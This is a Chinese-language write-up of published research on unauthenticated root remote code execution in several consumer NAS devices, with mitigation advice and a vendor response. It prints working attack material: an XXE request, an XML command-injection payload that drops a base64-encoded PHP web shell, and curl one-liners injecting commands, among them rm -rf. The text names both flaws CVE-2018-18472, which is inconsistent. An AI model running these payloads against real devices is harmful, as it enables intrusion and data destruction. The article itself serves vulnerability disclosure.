NAS設(shè)備已成為許多中小型企業(yè)（SMB）的首選存儲(chǔ)設(shè)備。它們價(jià)格低廉，易于操作，如果空間不足，可以添加額外的存儲(chǔ)空間。但它足以保護(hù)公司數(shù)據(jù)嗎？我?guī)е@個(gè)問(wèn)題閱讀了安全研究人員Paulos Yibelo和Daniel Eshetu的研究報(bào)告，看能否將這里的漏洞利用在NAS設(shè)備中。

我們專注于發(fā)現(xiàn)那些只能在沒(méi)有任何用戶交互的情況下可以遠(yuǎn)程利用的關(guān)鍵漏洞。這意思是說(shuō)，認(rèn)證繞過(guò)是不夠的。我們希望以最高權(quán)限遠(yuǎn)程執(zhí)行設(shè)備上的命令，結(jié)果我們?cè)谒性O(shè)備上都取得了成功。

[[247608]]

一、研究結(jié)果摘要

在本項(xiàng)目中我們使用了四種流行的NAS設(shè)備：

1. WD My Book

2. NetGear Stora

3. SeaGate Home

4. Medion LifeCloud NAS

通過(guò)了解其IP地址，我們成功的在設(shè)備中獲得了root遠(yuǎn)程命令執(zhí)行，從而進(jìn)入了它們所在的網(wǎng)絡(luò)。

• 測(cè)試的所有四個(gè)NAS設(shè)備都遭受0 day未經(jīng)身份驗(yàn)證的root遠(yuǎn)程命令執(zhí)行（preauth RCE）漏洞。
• 漏洞允許黑客、政府或任何有惡意的人閱讀文件、添加/刪除用戶、添加/修改現(xiàn)有數(shù)據(jù)，或在所有設(shè)備上執(zhí)行具有最高權(quán)限的命令。
• 我們相信有許多其他NAS設(shè)備遭受類似的漏洞，因?yàn)镹AS設(shè)備似乎缺少預(yù)期的模式。
• 在本文發(fā)布時(shí)，這些漏洞（稱為CVE-2018-18472和CVE-2018-18471）仍未修補(bǔ)。
• 在線有近200萬(wàn)受影響的設(shè)備

二、CVE-2018-18472—Axentra Hipserv NAS固件中的XXE和未經(jīng)認(rèn)證的遠(yuǎn)程命令執(zhí)行。

Axentra Hipserv是一款運(yùn)行在多個(gè)設(shè)備上的NAS操作系統(tǒng)，可為不同設(shè)備提供基于云的登錄和文件存儲(chǔ)及管理功能。它被不同供應(yīng)商用于多種設(shè)備，具有共享固件的受影響設(shè)備是：

• Netgear Stora
• Seagate GoFlex Home
• Medion LifeCloud

該公司提供的固件具有一個(gè)主要使用PHP作為服務(wù)器端語(yǔ)言的Web界面。Web界面具有REST API端點(diǎn)和文件管理器，是一個(gè)典型Web管理界面。

固件分析

解壓縮固件并解碼文件后，php文件位于/var/www/html/ 中，webroot位于/var/www/html/ html中。web界面的主處理程序是homebase.php，RESTAPIController.php是其余API的主處理程序。所有的php文件都使用IONCube加密，IONCube有一個(gè)已知的公開(kāi)解碼器，并且鑒于使用的版本是舊版本，解碼文件不需要很長(zhǎng)時(shí)間。

第一部分: XXE

解碼文件后，未經(jīng)身份驗(yàn)證的話無(wú)法訪問(wèn)大多數(shù)API端點(diǎn)和Web界面。其中一個(gè)例外是REST API接口中的一些端點(diǎn)。其中一個(gè)端點(diǎn)位于/api/2.0/rest/aggregator/xml，它從POST數(shù)據(jù)加載xml數(shù)據(jù)，盡管它使用DOMDocument來(lái)加載（解析）不應(yīng)受到XXE攻擊的xml。

固件后端的libxml2是舊版本。這意味著默認(rèn)情況下未禁用外部實(shí)體加載，因而從此端點(diǎn)可以進(jìn)行開(kāi)發(fā)利用。通過(guò)該方式，可以讀取文件并執(zhí)行SSRF攻擊，下面給出了一個(gè)示例請(qǐng)求：

POST /api/2.0/rest/aggregator/xml HTTP/1.1 
Host: 192.168.10.21 
User-Agent: GoogleBot/2.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 246 
Cookie: HOMEBASEID=c4be432f8add72db591aaa72c0fbbd34 
Connection: close 
Upgrade-Insecure-Requests: 1 
<?xml version=”1.0″?> 
<!DOCTYPE requests [ 
<!ELEMENT request (#PCDATA)> 
<!ENTITY % dtd SYSTEM “http://192.168.10.20/XXE_CHECK”> 
%dtd; 
]> 
<requests> 
<request href=”/api/2.0/rest/3rdparty/facebook/” method=”GET”></request> 
</requests> 

上述請(qǐng)求導(dǎo)致xml解析器向我們的服務(wù)器192.168.56.1發(fā)出請(qǐng)求，請(qǐng)求文件XXE_CHECK。雖然LFI有意抓取一些敏感文件，但因?yàn)閄ML無(wú)法處理二進(jìn)制數(shù)據(jù)，因此無(wú)法轉(zhuǎn)儲(chǔ)SQLite數(shù)據(jù)庫(kù)來(lái)獲取用戶名和密碼。

這意味著我們能夠在以下設(shè)備中讀取文件并發(fā)出SSRF請(qǐng)求。

• Netgear Stora
• Seagate GoFlex Home
• Medion LifeCloud

第二部分: RCE

下一步是查看Web界面（特別是REST API）如何執(zhí)行root操作。由于Web服務(wù)器以非root用戶身份運(yùn)行且沒(méi)有sudo權(quán)限，因此發(fā)現(xiàn)REST API調(diào)用名為oe-spd的本地守護(hù)程序，該守護(hù)程序在綁定到127.0.0.1的端口2000上運(yùn)行。

守護(hù)進(jìn)程獲取XML數(shù)據(jù)，解析請(qǐng)求并執(zhí)行操作而不進(jìn)行任何身份驗(yàn)證，除了確保請(qǐng)求來(lái)自127.0.0.1。更重要的是，守護(hù)進(jìn)程跳過(guò)垃圾數(shù)據(jù)，直到找到字符串<？xml version =“1.0”？>，如下面的IDA代碼段所示。

strstr(*input_data, “<?xml version=\”1.0\”?>”); 

這樣事情就變得更容易了，因?yàn)檎?qǐng)求使用HTTP協(xié)議發(fā)送，跳過(guò)垃圾數(shù)據(jù)（根據(jù)守護(hù)程序）幫了大忙。但是，由于不能直接將URL放在xml文件中，我們讓xml解析器向php腳本（或任何真正重定向的腳本）發(fā)送請(qǐng)求，將其重定向到http://127.0.0.1:2000/a.php?d=*payload here*。

由于守護(hù)進(jìn)程存在命令執(zhí)行漏洞，因此很容易構(gòu)造一個(gè)觸發(fā)請(qǐng)求的請(qǐng)求。此外，由于守護(hù)程序以root權(quán)限運(yùn)行，因此可以在設(shè)備上執(zhí)行任何操作。下面給出了有效載荷示例。

這個(gè)示例上傳一個(gè)php shell /var/www/html/html/u.php (<device-ip>/u.php?cmd=id).

<?xml version=”1.0″?><proxy_request><command_name>usb</command_name><operation_name>eject</operation_name><parameter parameter_name=”disk”>a`echo PD9waHAKZWNobyAnPHByZT4nOwpzeXN0ZW0oJF9HRVRbJ2NtZCddKTsKZWNobyAnPC9wcmU+JzsKPz4K | base64 -d >/var/www/html/html/u.php`</parameter></proxy_request> 

WizCase報(bào)告：四種流行NAS設(shè)備中發(fā)現(xiàn)多個(gè)漏洞

三、合而為一

為了無(wú)縫鏈接漏洞，我們需要一個(gè)服務(wù)器，設(shè)備可以與之建立出站連接，以及簡(jiǎn)單的PHP腳本，該腳本重定向解析器以發(fā)送有效載荷并能處理少量多階段的有效載荷。

四、CVE-2018-18472—WD MyBook Live未經(jīng)身份驗(yàn)證的遠(yuǎn)程命令執(zhí)行

WD MyBook Live和某些型號(hào)的WD MyCloud NAS包含一個(gè)可遠(yuǎn)程利用的漏洞，允許任何人以root用戶身份在設(shè)備上運(yùn)行命令。該漏洞存在于語(yǔ)言更改中并修改了REST API中的功能，以下PoC演示了此漏洞。

PoC:

curl –kX PUT  -d ‘language=en_US`<linx Command Here>`’  https://<NAS_IP>/api/1.0/rest/language_configuration 

示例:

curl –kX PUT  -d ‘language=en_US`id > /var/www/id.txt`’  https://<NAS_IP>/api/1.0/rest/language_configuration 

poc將在webroot中創(chuàng)建一個(gè)包含ID命令輸出的id.txt文件。可以使用以下PoC刪除該文件：

curl -kX PUT  -d ‘language=en_US`rm -rf /var/www/id.txt`’  https://<NAS_IP>/api/1.0/rest/language_configuration 

五、措施

· 如果正在使用上述設(shè)備之一且已在WAN上連接，請(qǐng)務(wù)必從互聯(lián)網(wǎng)上刪除設(shè)備。（確保它們僅在安全網(wǎng)絡(luò)中本地運(yùn)行）

· 務(wù)必聯(lián)系受影響的供應(yīng)商并堅(jiān)持盡快發(fā)布補(bǔ)?。?/p>

· 我們將在補(bǔ)丁可用時(shí)更新本文。

· 我們還建議使用VPN來(lái)保護(hù)計(jì)算機(jī)和移動(dòng)設(shè)備免受黑客攻擊。 ExpressVPN 和NordVPN 都使用AES 256位加密，并將保護(hù)所有數(shù)據(jù)。（這不會(huì)保護(hù)免受NAS攻擊，但它會(huì)保護(hù)免受其他網(wǎng)絡(luò)攻擊）

六、響應(yīng)

漏洞報(bào)告CVE-2018-18472會(huì)影響最早在2010年至2012年間推向市場(chǎng)的My Book Live設(shè)備。這些產(chǎn)品自2014年起停產(chǎn)，不再支持設(shè)備軟件更新服務(wù)。在此，我們希望和鼓勵(lì)這些繼續(xù)運(yùn)行舊版產(chǎn)品的用戶配置防火墻，以防止遠(yuǎn)程訪問(wèn)這些設(shè)備，并采取措施確保只有本地網(wǎng)絡(luò)上的受信任設(shè)備才能訪問(wèn)該設(shè)備。

注：完整報(bào)告見(jiàn)https://www.wizcase.com/blog/hack-2018/